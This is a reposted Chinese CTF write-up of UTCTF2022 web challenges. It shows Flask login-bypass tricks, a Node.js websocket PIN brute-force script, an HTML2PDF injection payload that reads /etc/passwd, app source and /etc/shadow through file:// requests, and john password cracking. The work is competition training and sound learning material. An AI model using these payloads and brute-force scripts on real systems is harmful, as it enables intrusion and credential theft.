IT数码 购物 网址 头条 软件 日历 阅读 图书馆
TxT小说阅读器
↓语音阅读,小说下载,古典文学↓
图片批量下载器
↓批量下载图片,美女图库↓
图片自动播放器
↓图片自动播放器↓
一键清除垃圾
↓轻轻一点,清除系统垃圾↓
开发: C++知识库 Java知识库 JavaScript Python PHP知识库 人工智能 区块链 大数据 移动开发 嵌入式 开发工具 数据结构与算法 开发测试 游戏开发 网络协议 系统运维
教程: HTML教程 CSS教程 JavaScript教程 Go语言教程 JQuery教程 VUE教程 VUE3教程 Bootstrap教程 SQL数据库教程 C语言教程 C++教程 Java教程 Python教程 Python3教程 C#教程
数码: 电脑 笔记本 显卡 显示器 固态硬盘 硬盘 耳机 手机 iphone vivo oppo 小米 华为 单反 装机 图拉丁
 
   -> Python知识库 -> [UTCTF2022]WEB wp -> 正文阅读

[Python知识库][UTCTF2022]WEB wp

Beginner

Login as Admin Pt 1

from flask import *
app = Flask(__name__)

@app.route('/', methods=['GET', 'POST'])
def login():
    cookie = request.cookies.get('isAdmin')
    if request.method == 'POST':
        if request.form['username'] == "admin" and request.form['pwd'] == "admin" and cookie == "True":
            with open('flag.txt', 'r') as file:
                flag = file.read()
            return make_response("Hello Admin! The flag is " + flag), 200
        else:
            return render_template('index.html', loginFailed=True)
    else:
        resp = make_response(render_template('index.html'))
        if not cookie:
            resp.set_cookie('isAdmin', 'False', max_age=60*60*24)
            resp.headers['location'] = url_for('login')
        return resp

if __name__ == '__main__':
    app.run(host='0.0.0.0')

改一下cookie

Login as Admin Pt 2

from flask import *
app = Flask(__name__)

@app.route('/', methods=['GET', 'POST'])
def login():
    if request.method == 'POST':
        if request.form['username'] == "admin" and request.form['pwd'] == "admin":
            with open('flag.txt', 'r') as file:
                flag = file.read()
            return make_response("Hello Admin! The flag is " + flag), 200
        else:
            return render_template('index.html', loginFailed=True)
    else:
        return render_template('index.html')

if __name__ == '__main__':
    app.run(host='0.0.0.0')

POST发包

Login as Admin Pt 3

from flask import *
app = Flask(__name__)

@app.route('/', methods=['GET', 'POST'])
def login():
    if request.method == 'POST':
        if request.form['username'] == "admin" and request.form['pwd'] == "admin" and request.form['isAdmin'] == "True":
            with open('flag.txt', 'r') as file:
                flag = file.read()
            return make_response("Hello Admin! The flag is " + flag), 200
        else:
            return render_template('index.html', loginFailed=True)
    else:
        return render_template('index.html')

if __name__ == '__main__':
    app.run(host='0.0.0.0')

username=admin&pwd=admin&isAdmin=True

Web

Websockets?

有个登录页:

image-20220314105030990

源码中提示:

what is this garbage, you ask? Well, most of our pins are now 16 digits, but we still have some old 3-digit pins left because tom is a moron and can't remember jack

猜测密码应该是三位数字

再看看JS文件:

document.querySelector("input[type=submit]").addEventListener("click", checkPassword);

function checkPassword(evt) {
    evt.preventDefault();
    const socket = new WebSocket("ws://" + window.location.host + "/internal/ws")
    socket.addEventListener('message', (event) => {
        if (event.data == "begin") {
            socket.send("begin");
            socket.send("user " + document.querySelector("input[name=username]").value)
            socket.send("pass " + document.querySelector("input[name=password]").value)
        } else if (event.data == "baduser") {
            document.querySelector(".error").innerHTML = "Unknown user";
            socket.close()
        } else if (event.data == "badpass") {
            document.querySelector(".error").innerHTML = "Incorrect PIN";
            socket.close()
        } else if (event.data.startsWith("session ")) {
            document.cookie = "flask-session=" + event.data.replace("session ", "") + ";";
            socket.send("goodbye")
            socket.close()
            window.location = "/internal/user";
        } else {
            document.querySelector(".error").innerHTML = "Unknown error";
            socket.close()
        }
    })
}

写一个爆破脚本:

const WebSocket = require('ws');

pins = ["000","001","002","003","004","005","006","007","008","009","010","011","012","013","014","015","016","017","018","019","020","021","022","023","024","025","026","027","028","029","030","031","032","033","034","035","036","037","038","039","040","041","042","043","044","045","046","047","048","049","050","051","052","053","054","055","056","057","058","059","060","061","062","063","064","065","066","067","068","069","070","071","072","073","074","075","076","077","078","079","080","081","082","083","084","085","086","087","088","089","090","091","092","093","094","095","096","097","098","099","100","101","102","103","104","105","106","107","108","109","110","111","112","113","114","115","116","117","118","119","120","121","122","123","124","125","126","127","128","129","130","131","132","133","134","135","136","137","138","139","140","141","142","143","144","145","146","147","148","149","150","151","152","153","154","155","156","157","158","159","160","161","162","163","164","165","166","167","168","169","170","171","172","173","174","175","176","177","178","179","180","181","182","183","184","185","186","187","188","189","190","191","192","193","194","195","196","197","198","199","200","201","202","203","204","205","206","207","208","209","210","211","212","213","214","215","216","217","218","219","220","221","222","223","224","225","226","227","228","229","230","231","232","233","234","235","236","237","238","239","240","241","242","243","244","245","246","247","248","249","250","251","252","253","254","255","256","257","258","259","260","261","262","263","264","265","266","267","268","269","270","271","272","273","274","275","276","277","278","279","280","281","282","283","284","285","286","287","288","289","290","291","292","293","294","295","296","297","298","299","300","301","302","303","304","305","306","307","308","309","310","311","312","313","314","315","316","317","318","319","320","321","322","323","324","325","326","327","328","329","330","331","332","333","334","335","336","337","338","339","340","341","342","343","344","345","346","347","348","349","350","351","352","353","354","355","356","357","358","359","360","361","362","363","364","365","366","367","368","369","370","371","372","373","374","375","376","377","378","379","380","381","382","383","384","385","386","387","388","389","390","391","392","393","394","395","396","397","398","399","400","401","402","403","404","405","406","407","408","409","410","411","412","413","414","415","416","417","418","419","420","421","422","423","424","425","426","427","428","429","430","431","432","433","434","435","436","437","438","439","440","441","442","443","444","445","446","447","448","449","450","451","452","453","454","455","456","457","458","459","460","461","462","463","464","465","466","467","468","469","470","471","472","473","474","475","476","477","478","479","480","481","482","483","484","485","486","487","488","489","490","491","492","493","494","495","496","497","498","499","500","501","502","503","504","505","506","507","508","509","510","511","512","513","514","515","516","517","518","519","520","521","522","523","524","525","526","527","528","529","530","531","532","533","534","535","536","537","538","539","540","541","542","543","544","545","546","547","548","549","550","551","552","553","554","555","556","557","558","559","560","561","562","563","564","565","566","567","568","569","570","571","572","573","574","575","576","577","578","579","580","581","582","583","584","585","586","587","588","589","590","591","592","593","594","595","596","597","598","599","600","601","602","603","604","605","606","607","608","609","610","611","612","613","614","615","616","617","618","619","620","621","622","623","624","625","626","627","628","629","630","631","632","633","634","635","636","637","638","639","640","641","642","643","644","645","646","647","648","649","650","651","652","653","654","655","656","657","658","659","660","661","662","663","664","665","666","667","668","669","670","671","672","673","674","675","676","677","678","679","680","681","682","683","684","685","686","687","688","689","690","691","692","693","694","695","696","697","698","699","700","701","702","703","704","705","706","707","708","709","710","711","712","713","714","715","716","717","718","719","720","721","722","723","724","725","726","727","728","729","730","731","732","733","734","735","736","737","738","739","740","741","742","743","744","745","746","747","748","749","750","751","752","753","754","755","756","757","758","759","760","761","762","763","764","765","766","767","768","769","770","771","772","773","774","775","776","777","778","779","780","781","782","783","784","785","786","787","788","789","790","791","792","793","794","795","796","797","798","799","800","801","802","803","804","805","806","807","808","809","810","811","812","813","814","815","816","817","818","819","820","821","822","823","824","825","826","827","828","829","830","831","832","833","834","835","836","837","838","839","840","841","842","843","844","845","846","847","848","849","850","851","852","853","854","855","856","857","858","859","860","861","862","863","864","865","866","867","868","869","870","871","872","873","874","875","876","877","878","879","880","881","882","883","884","885","886","887","888","889","890","891","892","893","894","895","896","897","898","899","900","901","902","903","904","905","906","907","908","909","910","911","912","913","914","915","916","917","918","919","920","921","922","923","924","925","926","927","928","929","930","931","932","933","934","935","936","937","938","939","940","941","942","943","944","945","946","947","948","949","950","951","952","953","954","955","956","957","958","959","960","961","962","963","964","965","966","967","968","969","970","971","972","973","974","975","976","977","978","979","980","981","982","983","984","985","986","987","988","989","990","991","992","993","994","995","996","997","998","999"]

for (let step = 0; step < pins.length; step++) {
  checkPassword(pins[step]);
}

function checkPassword(maybePin) {
    const socket = new WebSocket("ws://web1.utctf.live:8651//internal/ws")
    socket.addEventListener('message', (event) => {
        if (event.data == "begin") {
            socket.send("begin");
            socket.send("user admin")
            socket.send("pass "+maybePin)
        }  else if (event.data == "badpass") {
            socket.close()
        } else if (event.data.startsWith("session ")) {
            console.log("Found the pin:");
            console.log(maybePin);
            socket.close()
        }
    })
}

成功爆破出密码

image-20220314110421858

登录即可
image-20220314110643708

HTML2PDF

它会运行文本框中代码并转换为pdf

我们可以用来读文件

<h1 id='test2'>a</h1><script>x = new XMLHttpRequest();
x.open('GET','file:///etc/passwd',false);
x.send();
document.getElementById('test2').innerHTML= x.responseText+location.href;
</script>

image-20220314125742159

添加location.href 查找当前路径,之后读一下app.py

<h1 id='test2'>a</h1><script>x = new XMLHttpRequest();
x.open('GET','file:///usr/src/app/app.py',false);
x.send();
document.getElementById('test2').innerHTML= x.responseText;
</script>

image-20220314131643941

禁止从环境变量中读取flag,有一个admin路由,需要登录admin账户获得flag

image-20220314131830092

有一个WeakPasswordAdmin 的帐户,我们抓一下etc/shadow

image-20220314185015868

爆破一下密码:

导入passwd和shadow

unshadow passwd shadow > pwd.txt
john pwd.txt
john --show pwd.txt

image-20220314185515688

登陆即可

image-20220314185610216

  Python知识库 最新文章
Python中String模块
【Python】 14-CVS文件操作
python的panda库读写文件
使用Nordic的nrf52840实现蓝牙DFU过程
【Python学习记录】numpy数组用法整理
Python学习笔记
python字符串和列表
python如何从txt文件中解析出有效的数据
Python编程从入门到实践自学/3.1-3.2
python变量
上一篇文章      下一篇文章      查看所有文章
加:2022-03-15 22:28:05  更:2022-03-15 22:28:12 
 
开发: C++知识库 Java知识库 JavaScript Python PHP知识库 人工智能 区块链 大数据 移动开发 嵌入式 开发工具 数据结构与算法 开发测试 游戏开发 网络协议 系统运维
教程: HTML教程 CSS教程 JavaScript教程 Go语言教程 JQuery教程 VUE教程 VUE3教程 Bootstrap教程 SQL数据库教程 C语言教程 C++教程 Java教程 Python教程 Python3教程 C#教程
数码: 电脑 笔记本 显卡 显示器 固态硬盘 硬盘 耳机 手机 iphone vivo oppo 小米 华为 单反 装机 图拉丁

360图书馆 购物 三丰科技 阅读网 日历 万年历 2024年12日历 -2024/12/29 16:45:19-

图片自动播放器
↓图片自动播放器↓
TxT小说阅读器
↓语音阅读,小说下载,古典文学↓
一键清除垃圾
↓轻轻一点,清除系统垃圾↓
图片批量下载器
↓批量下载图片,美女图库↓
  网站联系: qq:121756557 email:121756557@qq.com  IT数码
数据统计